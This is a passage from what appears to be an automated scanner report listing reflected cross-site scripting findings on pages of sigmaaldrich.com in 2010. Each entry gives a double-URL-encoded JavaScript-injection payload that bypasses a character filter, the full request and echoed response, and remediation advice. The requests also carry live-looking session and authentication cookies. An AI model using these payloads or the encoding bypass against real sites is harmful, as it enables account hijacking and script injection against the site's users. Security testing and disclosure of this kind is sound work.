This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/functional-genomics-and-rnai/shrna/f8c45%2522%253balert%25281%2529%252f%252f7c853d125b2 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/functional-genomics-and-rnai/shrna/f8c45";alert(1)//7c853d125b2","E404") ;
   </script>
...[SNIP]...

1.550. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/mission-custom-request.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna/mission-custom-request.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a2c1%2522%253balert%25281%2529%252f%252f0bfaa621c3 was submitted in the REST URL parameter 1. This input was echoed as 2a2c1";alert(1)//0bfaa621c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science2a2c1%2522%253balert%25281%2529%252f%252f0bfaa621c3/functional-genomics-and-rnai/shrna/mission-custom-request.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science2a2c1";alert(1)//0bfaa621c3/functional-genomics-and-rnai/shrna/mission-custom-request.html","E404") ;
   </script>
...[SNIP]...

1.551. http://www.sigmaaldrich.com/life-science/labware-and-equipment.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/labware-and-equipment.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c973%2522%253balert%25281%2529%252f%252f24796da3f66 was submitted in the REST URL parameter 1. This input was echoed as 9c973";alert(1)//24796da3f66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science9c973%2522%253balert%25281%2529%252f%252f24796da3f66/labware-and-equipment.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:37 GMT
Content-Length: 28943
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science9c973";alert(1)//24796da3f66/labware-and-equipment.html","E404") ;
   </script>
...[SNIP]...

1.552. http://www.sigmaaldrich.com/life-science/labware-and-equipment.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/labware-and-equipment.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6c34%2522%253balert%25281%2529%252f%252fbc5831b33bd was submitted in the REST URL parameter 2. This input was echoed as c6c34";alert(1)//bc5831b33bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/c6c34%2522%253balert%25281%2529%252f%252fbc5831b33bd HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:39 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/c6c34";alert(1)//bc5831b33bd","E404") ;
   </script>
...[SNIP]...

1.553. http://www.sigmaaldrich.com/life-science/learning-center.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/learning-center.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eb75%2522%253balert%25281%2529%252f%252f874a57ef240 was submitted in the REST URL parameter 1. This input was echoed as 2eb75";alert(1)//874a57ef240 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science2eb75%2522%253balert%25281%2529%252f%252f874a57ef240/learning-center.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:35 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science2eb75";alert(1)//874a57ef240/learning-center.html","E404") ;
   </script>
...[SNIP]...

1.554. http://www.sigmaaldrich.com/life-science/learning-center.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/learning-center.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fffa9%2522%253balert%25281%2529%252f%252f3d3b109cc80 was submitted in the REST URL parameter 2. This input was echoed as fffa9";alert(1)//3d3b109cc80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/fffa9%2522%253balert%25281%2529%252f%252f3d3b109cc80 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
